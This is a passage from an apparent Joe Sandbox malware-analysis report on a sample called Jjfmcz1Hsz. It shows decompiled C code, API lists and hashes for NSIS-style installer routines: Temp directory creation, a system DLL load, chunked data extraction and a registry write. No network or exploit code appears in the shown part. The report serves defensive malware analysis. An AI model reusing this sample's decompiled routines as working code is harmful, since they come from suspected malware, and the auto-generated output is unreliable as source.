                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t23;
                                                                                                                                                                            			}







                                                                                                                                                                            0x004053e3
                                                                                                                                                                            0x004053e7
                                                                                                                                                                            0x004053ea
                                                                                                                                                                            0x004053f0
                                                                                                                                                                            0x004053f4
                                                                                                                                                                            0x004053f8
                                                                                                                                                                            0x00405400
                                                                                                                                                                            0x00405407
                                                                                                                                                                            0x0040540d
                                                                                                                                                                            0x00405414
                                                                                                                                                                            0x0040541b
                                                                                                                                                                            0x00405423
                                                                                                                                                                            0x00405425
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405425
                                                                                                                                                                            0x0040542f
                                                                                                                                                                            0x00405436
                                                                                                                                                                            0x0040544c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040544e
                                                                                                                                                                            0x00405452

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541B
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040542F
                                                                                                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405444
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040544E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                                                                                            • API String ID: 3449924974-2230009264
                                                                                                                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                            • Instruction ID: 5d613d5f07efa900d759e60f8f8ec78c4c71b6ffd2fe208e339ff175f81ef67f
                                                                                                                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                            • Instruction Fuzzy Hash: F3010871D14259EADF119FA0D9487EFBFB8EB04315F00417AE904B6280D378A644CFAA
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 897 406024-406044 GetSystemDirectoryA 898 406046 897->898 899 406048-40604a 897->899 898->899 900 40605a-40605c 899->900 901 40604c-406054 899->901 903 40605d-40608f wsprintfA LoadLibraryExA 900->903 901->900 902 406056-406058 901->902 902->903
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00406024(intOrPtr _a4) {
                                                                                                                                                                            				char _v292;
                                                                                                                                                                            				int _t10;
                                                                                                                                                                            				struct HINSTANCE__* _t14;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				void* _t21;
                                                                                                                                                                            
                                                                                                                                                                            				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                                                                                                            				if(_t10 > 0x104) {
                                                                                                                                                                            					_t10 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                                                                                                            					_t16 = 1;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t16 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t5 = _t16 + 0x409014; // 0x5c
                                                                                                                                                                            				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                                                                                                            				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                                                                                                            				return _t14;
                                                                                                                                                                            			}








                                                                                                                                                                            0x0040603b
                                                                                                                                                                            0x00406044
                                                                                                                                                                            0x00406046
                                                                                                                                                                            0x00406046
                                                                                                                                                                            0x0040604a
                                                                                                                                                                            0x0040605c
                                                                                                                                                                            0x00406056
                                                                                                                                                                            0x00406056
                                                                                                                                                                            0x00406056
                                                                                                                                                                            0x00406060
                                                                                                                                                                            0x00406074
                                                                                                                                                                            0x00406088
                                                                                                                                                                            0x0040608f

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
                                                                                                                                                                            • wsprintfA.USER32 ref: 00406074
                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                            • API String ID: 2200240437-4240819195
                                                                                                                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                            • Instruction ID: 72752c577983536edbae7b7a4b2c1439e1101fa4b93fa8d0208d5a4e16dde88a
                                                                                                                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0FC30A40109AADB14E764DC0DFEB365CAB09305F140576A546E11D1D578E9258B69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 904 402e9f-402eb3 905 402eb5 904->905 906 402ebc-402ec4 904->906 905->906 907 402ec6 906->907 908 402ecb-402ed0 906->908 907->908 909 402ee0-402eed call 40307b 908->909 910 402ed2-402edb call 403091 908->910 914 403032 909->914 915 402ef3-402ef7 909->915 910->909 918 403034-403035 914->918 916 40301b-40301d 915->916 917 402efd-402f1d GetTickCount call 406175 915->917 919 403066-40306a 916->919 920 40301f-403022 916->920 928 403071 917->928 930 402f23-402f2b 917->930 922 403074-403078 918->922 923 403037-40303d 919->923 924 40306c 919->924 925 403024 920->925 926 403027-403030 call 40307b 920->926 931 403042-403050 call 40307b 923->931 932 40303f 923->932 924->928 925->926 926->914 937 40306e 926->937 928->922 934 402f30-402f3e call 40307b 930->934 935 402f2d 930->935 931->914 941 403052-403057 call 405a13 931->941 932->931 934->914 942 402f44-402f4d 934->942 935->934 937->928 945 40305c-40305e 941->945 944 402f53-402f70 call 406195 942->944 950 403013-403015 944->950 951 402f76-402f8d GetTickCount 944->951 947 403060-403063 945->947 948 403017-403019 945->948 947->919 948->918 950->918 952 402fd2-402fd4 951->952 953 402f8f-402f97 951->953 954 402fd6-402fda 952->954 955 403007-40300b 952->955 956 402f99-402f9d 953->956 957 402f9f-402fcf MulDiv wsprintfA call 404f12 953->957 959 402fdc-402fe1 call 405a13 954->959 960 402fef-402ff5 954->960 955->930 961 403011 955->961 956->952 956->957 957->952 965 402fe6-402fe8 959->965 964 402ffb-402fff 960->964 961->928 964->944 966 403005 964->966 965->948 967 402fea-402fed 965->967 966->928 967->964
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E00402E9F(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				int _v12;
                                                                                                                                                                            				long _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				char _v84;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				void* _t61;
                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                            				long _t70;
                                                                                                                                                                            				void* _t71;
                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                            				long _t89;
                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                            				int _t91;
                                                                                                                                                                            				int _t92;
                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                            				void* _t94;
                                                                                                                                                                            				void* _t95;
                                                                                                                                                                            
                                                                                                                                                                            				_t90 = _a16;
                                                                                                                                                                            				_t86 = _a12;
                                                                                                                                                                            				_v12 = _t90;
                                                                                                                                                                            				if(_t86 == 0) {
                                                                                                                                                                            					_v12 = 0x8000;
                                                                                                                                                                            				}
                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                            				_t81 = _t86;
                                                                                                                                                                            				if(_t86 == 0) {
                                                                                                                                                                            					_t81 = 0x40e8c0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t56 = _a4;
                                                                                                                                                                            				if(_a4 >= 0) {
                                                                                                                                                                            					E00403091( *0x423758 + _t56);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(E0040307B( &_a16, 4) == 0) {
                                                                                                                                                                            					L33:
                                                                                                                                                                            					_push(0xfffffffd);
                                                                                                                                                                            					goto L34;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if((_a19 & 0x00000080) == 0) {
                                                                                                                                                                            						if(_t86 == 0) {
                                                                                                                                                                            							while(_a16 > 0) {
                                                                                                                                                                            								_t91 = _v12;
                                                                                                                                                                            								if(_a16 < _t91) {
                                                                                                                                                                            									_t91 = _a16;
                                                                                                                                                                            								}
                                                                                                                                                                            								if(E0040307B(0x40a8c0, _t91) == 0) {
                                                                                                                                                                            									goto L33;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t61 = E00405A13(_a8, 0x40a8c0, _t91); // executed
                                                                                                                                                                            									if(_t61 == 0) {
                                                                                                                                                                            										L28:
                                                                                                                                                                            										_push(0xfffffffe);
                                                                                                                                                                            										L34:
                                                                                                                                                                            										_pop(_t59);
                                                                                                                                                                            										return _t59;
                                                                                                                                                                            									}
                                                                                                                                                                            									_v8 = _v8 + _t91;
                                                                                                                                                                            									_a16 = _a16 - _t91;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L43:
                                                                                                                                                                            							return _v8;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_a16 < _t90) {
                                                                                                                                                                            							_t90 = _a16;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(E0040307B(_t86, _t90) != 0) {
                                                                                                                                                                            							_v8 = _t90;
                                                                                                                                                                            							goto L43;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_v16 = GetTickCount();
                                                                                                                                                                            					E00406175(0x40a830);
                                                                                                                                                                            					_t13 =  &_a16;
                                                                                                                                                                            					 *_t13 = _a16 & 0x7fffffff;
                                                                                                                                                                            					_a4 = _a16;
                                                                                                                                                                            					if( *_t13 <= 0) {
                                                                                                                                                                            						goto L43;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L9:
                                                                                                                                                                            						_t92 = 0x4000;
                                                                                                                                                                            						if(_a16 < 0x4000) {
                                                                                                                                                                            							_t92 = _a16;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(E0040307B(0x40a8c0, _t92) == 0) {
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            						_a16 = _a16 - _t92;
                                                                                                                                                                            						 *0x40a848 = 0x40a8c0;
                                                                                                                                                                            						 *0x40a84c = _t92;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							 *0x40a850 = _t81;
                                                                                                                                                                            							 *0x40a854 = _v12; // executed
                                                                                                                                                                            							_t69 = E00406195(0x40a830); // executed
                                                                                                                                                                            							_v20 = _t69;
                                                                                                                                                                            							if(_t69 < 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t93 =  *0x40a850; // 0x40e8c0
                                                                                                                                                                            							_t94 = _t93 - _t81;
                                                                                                                                                                            							_t70 = GetTickCount();
                                                                                                                                                                            							_t89 = _t70;
                                                                                                                                                                            							if(( *0x4237b4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
                                                                                                                                                                            								wsprintfA( &_v84, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                                                                                            								_t95 = _t95 + 0xc;
                                                                                                                                                                            								E00404F12(0,  &_v84);
                                                                                                                                                                            								_v16 = _t89;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t94 == 0) {
                                                                                                                                                                            								if(_a16 > 0) {
                                                                                                                                                                            									goto L9;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L43;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_a12 != 0) {
                                                                                                                                                                            									_v8 = _v8 + _t94;
                                                                                                                                                                            									_v12 = _v12 - _t94;
                                                                                                                                                                            									_t81 =  *0x40a850; // 0x40e8c0
                                                                                                                                                                            									L23:
                                                                                                                                                                            									if(_v20 != 1) {
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L43;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t71 = E00405A13(_a8, _t81, _t94); // executed
                                                                                                                                                                            								if(_t71 == 0) {
                                                                                                                                                                            									goto L28;
                                                                                                                                                                            								}
                                                                                                                                                                            								_v8 = _v8 + _t94;
                                                                                                                                                                            								goto L23;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(0xfffffffc);
                                                                                                                                                                            						goto L34;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L33;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






















                                                                                                                                                                            0x00402ea7
                                                                                                                                                                            0x00402eab
                                                                                                                                                                            0x00402eae
                                                                                                                                                                            0x00402eb3
                                                                                                                                                                            0x00402eb5
                                                                                                                                                                            0x00402eb5
                                                                                                                                                                            0x00402ebc
                                                                                                                                                                            0x00402ec0
                                                                                                                                                                            0x00402ec4
                                                                                                                                                                            0x00402ec6
                                                                                                                                                                            0x00402ec6
                                                                                                                                                                            0x00402ecb
                                                                                                                                                                            0x00402ed0
                                                                                                                                                                            0x00402edb
                                                                                                                                                                            0x00402edb
                                                                                                                                                                            0x00402eed
                                                                                                                                                                            0x00403032
                                                                                                                                                                            0x00403032
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402ef3
                                                                                                                                                                            0x00402ef7
                                                                                                                                                                            0x0040301d
                                                                                                                                                                            0x00403066
                                                                                                                                                                            0x00403037
                                                                                                                                                                            0x0040303d
                                                                                                                                                                            0x0040303f
                                                                                                                                                                            0x0040303f
                                                                                                                                                                            0x00403050
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403052
                                                                                                                                                                            0x00403057
                                                                                                                                                                            0x0040305e
                                                                                                                                                                            0x00403017
                                                                                                                                                                            0x00403017
                                                                                                                                                                            0x00403034
                                                                                                                                                                            0x00403034
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403034
                                                                                                                                                                            0x00403060
                                                                                                                                                                            0x00403063
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403063
                                                                                                                                                                            0x00403050
                                                                                                                                                                            0x00403071
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403071
                                                                                                                                                                            0x00403022
                                                                                                                                                                            0x00403024
                                                                                                                                                                            0x00403024
                                                                                                                                                                            0x00403030
                                                                                                                                                                            0x0040306e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403030
                                                                                                                                                                            0x00402f08
                                                                                                                                                                            0x00402f0b
                                                                                                                                                                            0x00402f10
                                                                                                                                                                            0x00402f10
                                                                                                                                                                            0x00402f1a
                                                                                                                                                                            0x00402f1d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402f23
                                                                                                                                                                            0x00402f23
                                                                                                                                                                            0x00402f23
                                                                                                                                                                            0x00402f2b
                                                                                                                                                                            0x00402f2d
                                                                                                                                                                            0x00402f2d
                                                                                                                                                                            0x00402f3e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402f44
                                                                                                                                                                            0x00402f47
                                                                                                                                                                            0x00402f4d
                                                                                                                                                                            0x00402f53
                                                                                                                                                                            0x00402f5b
                                                                                                                                                                            0x00402f61
                                                                                                                                                                            0x00402f66
                                                                                                                                                                            0x00402f6d
                                                                                                                                                                            0x00402f70
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402f76
                                                                                                                                                                            0x00402f7c
                                                                                                                                                                            0x00402f7e
                                                                                                                                                                            0x00402f8b
                                                                                                                                                                            0x00402f8d
                                                                                                                                                                            0x00402fbb
                                                                                                                                                                            0x00402fc1
                                                                                                                                                                            0x00402fca
                                                                                                                                                                            0x00402fcf
                                                                                                                                                                            0x00402fcf
                                                                                                                                                                            0x00402fd4
                                                                                                                                                                            0x0040300b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402fd6
                                                                                                                                                                            0x00402fda
                                                                                                                                                                            0x00402fef
                                                                                                                                                                            0x00402ff2
                                                                                                                                                                            0x00402ff5
                                                                                                                                                                            0x00402ffb
                                                                                                                                                                            0x00402fff
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403005
                                                                                                                                                                            0x00402fe1
                                                                                                                                                                            0x00402fe8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402fea
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402fea
                                                                                                                                                                            0x00402fd4
                                                                                                                                                                            0x00403013
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403013
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402f23

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                            • API String ID: 551687249-2449383134
                                                                                                                                                                            • Opcode ID: fb8bdaecb8610db7079700bd5469a99c5e74861b297f6c97a10e9c8668abb65b
                                                                                                                                                                            • Instruction ID: 4ab2a5a1bcd3fb7fa9d72e81aa521510b391fe67da8672e6f00875cd24a8b3cf
                                                                                                                                                                            • Opcode Fuzzy Hash: fb8bdaecb8610db7079700bd5469a99c5e74861b297f6c97a10e9c8668abb65b
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D518F729022199BDF10DF65DA08A9F7BB8AF40795F14413BF800B72C4C7789E51DBAA
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 968 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 975 4023b0-4023b8 968->975 976 4028cf-4028de 968->976 977 4023c8-4023cb 975->977 978 4023ba-4023c7 call 402a3a lstrlenA 975->978 982 4023db-4023de 977->982 983 4023cd-4023da call 402a1d 977->983 978->977 986 4023e0-4023ea call 402e9f 982->986 987 4023ef-402403 RegSetValueExA 982->987 983->982 986->987 990 402405 987->990 991 402408-4024de RegCloseKey 987->991 990->991 991->976 993 4026a6-4026ad 991->993 993->976
                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E00402364(void* __eax) {
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				char* _t18;
                                                                                                                                                                            				int _t19;
                                                                                                                                                                            				long _t22;
                                                                                                                                                                            				char _t24;
                                                                                                                                                                            				int _t27;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 = E00402B2F(__eax);
                                                                                                                                                                            				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                                                                                                                                            				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                                                                                                                                            				 *(_t37 - 0x38) = E00402A3A(2);
                                                                                                                                                                            				_t18 = E00402A3A(0x11);
                                                                                                                                                                            				 *(_t37 - 4) = 1;
                                                                                                                                                                            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x4237b0 | 0x00000002, _t27, _t37 + 8, _t27); // executed
                                                                                                                                                                            				if(_t19 == 0) {
                                                                                                                                                                            					if(_t35 == 1) {
                                                                                                                                                                            						E00402A3A(0x23);
                                                                                                                                                                            						_t19 = lstrlenA(0x409be8) + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t35 == 4) {
                                                                                                                                                                            						_t24 = E00402A1D(3);
                                                                                                                                                                            						 *0x409be8 = _t24;
                                                                                                                                                                            						_t19 = _t35;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t35 == 3) {
                                                                                                                                                                            						_t19 = E00402E9F( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x409be8, 0xc00);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x409be8, _t19); // executed
                                                                                                                                                                            					if(_t22 == 0) {
                                                                                                                                                                            						 *(_t37 - 4) = _t27;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push( *(_t37 + 8));
                                                                                                                                                                            					RegCloseKey(); // executed
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *(_t37 - 4);
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}











                                                                                                                                                                            0x00402365
                                                                                                                                                                            0x0040236a
                                                                                                                                                                            0x00402374
                                                                                                                                                                            0x0040237e
                                                                                                                                                                            0x00402381
                                                                                                                                                                            0x0040239b
                                                                                                                                                                            0x004023a2
                                                                                                                                                                            0x004023aa
                                                                                                                                                                            0x004023b8
                                                                                                                                                                            0x004023bc
                                                                                                                                                                            0x004023c7
                                                                                                                                                                            0x004023c7
                                                                                                                                                                            0x004023cb
                                                                                                                                                                            0x004023cf
                                                                                                                                                                            0x004023d5
                                                                                                                                                                            0x004023da
                                                                                                                                                                            0x004023da
                                                                                                                                                                            0x004023de
                                                                                                                                                                            0x004023ea
                                                                                                                                                                            0x004023ea
                                                                                                                                                                            0x004023fb
                                                                                                                                                                            0x00402403
                                                                                                                                                                            0x00402405
                                                                                                                                                                            0x00402405
                                                                                                                                                                            0x00402408
                                                                                                                                                                            0x004024d8
                                                                                                                                                                            0x004024d8
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
